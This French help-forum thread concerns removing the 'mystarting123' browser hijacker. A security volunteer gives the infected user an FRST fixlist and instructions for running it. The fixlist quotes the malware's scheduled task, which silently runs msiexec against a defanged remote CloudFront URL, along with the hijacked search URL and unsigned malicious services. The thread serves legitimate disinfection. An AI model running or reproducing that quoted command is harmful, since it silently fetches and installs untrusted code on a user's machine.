Infecté par mystarting123

RomainDELL -  
lilidurhone Messages postés 800 Date d'inscription   Statut Contributeur sécurité Dernière intervention   -
Bonjour,

Je suis infecté par mystrating123

j'ai fais un scan malwarebytes et Mcafee, il n'y a plus aucune menaces mais le moteur par defaut de chrome ne peut pas etre modifié.

J'ai fait un scan FRST voici les liens

http://www.cjoint.com/c/GECoiPUSeCo

http://www.cjoint.com/c/GEColgBpOto

En vous remerciant par avance pour votre aide.

Romain

1 réponse

  1. lilidurhone Messages postés 800 Date d'inscription   Statut Contributeur sécurité Dernière intervention   3 818
     
    /!\ Crée un point de restauration manuel avant d'appliquer le correctif - Tutoriel en images/!\

    ▶ Ouvre le Bloc-notes (Démarrer => Tous les programmes => Accessoires => Bloc-notes)
    ▶ Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes


    start
    Task: {48FA59FD-AB48-44FD-A62D-2E68C82588FD} - System32\Tasks\Microsoft\Windows\DeviceSettings\Qivither => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=PM961XNVMeXSAMSUNGX512GB_S33YNX0HB00842B00842&d=20170527 /q <==== ATTENTION
    CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=b06d06ec6db65096a73951agazct9w5teg8zdofcde�\u001D&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> mystarting123
    S2 6bb94bd5a406405626f7be4f6241fdc9; C:\Program Files\6bb94bd5a406405626f7be4f6241fdc9\5ab5c060cb6b577ec816a3c01d33cc6c.exe [885760 2017-05-26] () [Fichier non signé] <==== ATTENTION
    R2 terana; C:\Users\Romain\AppData\Local\terana\terana.dll [908288 2017-05-27] (IntertSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
    S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
    2017-05-20 00:20 - 2017-05-20 00:20 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign4998682047ea39c9
    2017-05-20 00:20 - 2017-05-20 00:20 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign0f931b8bfc8e251b
    2017-05-20 00:19 - 2017-05-20 00:19 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign6f88e863eefb0806
    2017-05-20 00:13 - 2017-05-20 00:13 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsignc995fa46aba5ed03
    2017-05-20 00:13 - 2017-05-20 00:13 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign4d8b7fdb6635d42c
    2017-05-20 00:13 - 2017-05-20 00:13 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign031d1e24c0423074
    2017-05-20 00:11 - 2017-05-20 00:11 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign83067e054b44a3b2
    2017-05-20 00:11 - 2017-05-20 00:11 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign73121e70f0ee521c
    2017-05-20 00:11 - 2017-05-20 00:11 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign2691482f786aaeae
    C:\Users\Romain\AppData\Local\Tempzxpsign654d4976114b8d4f
    2017-05-19 15:08 - 2017-05-19 15:08 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign514621f8dcbfa254
    2017-05-19 15:08 - 2017-05-19 15:08 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign4b0f48813ccbe6c0
    2017-05-19 00:05 - 2017-05-19 00:05 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign3c8ecd9fa87425f5
    2017-05-19 00:05 - 2017-05-19 00:05 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign0eb8df8f77fddad0
    2017-05-19 00:04 - 2017-05-19 00:04 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign80a55c98cd12fc35
    2017-05-19 00:04 - 2017-05-19 00:04 - 00000000 ____D C:\Users\Romain\AppData\Local\Tempzxpsign7d621edf5778368b
    end


    ▶ Enregistre le fichier sur ton Bureau (au même endroit que FRST) sous le nom fixlist.txt
    ▶ Ferme toutes les applications, y compris ton navigateur
    ▶ Double-clique sur FRST.exe
    /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    ▶ Sur le menu principal, clique une seule fois sur Correction et patiente le temps de la correction
    ▶ L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.

    /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\

    Ensuite réinstalle proprement Chrome en suivant ceci
    https://www.malekal.com/reparer-google-chrome/#Reinstaller_Google_Chrome
    0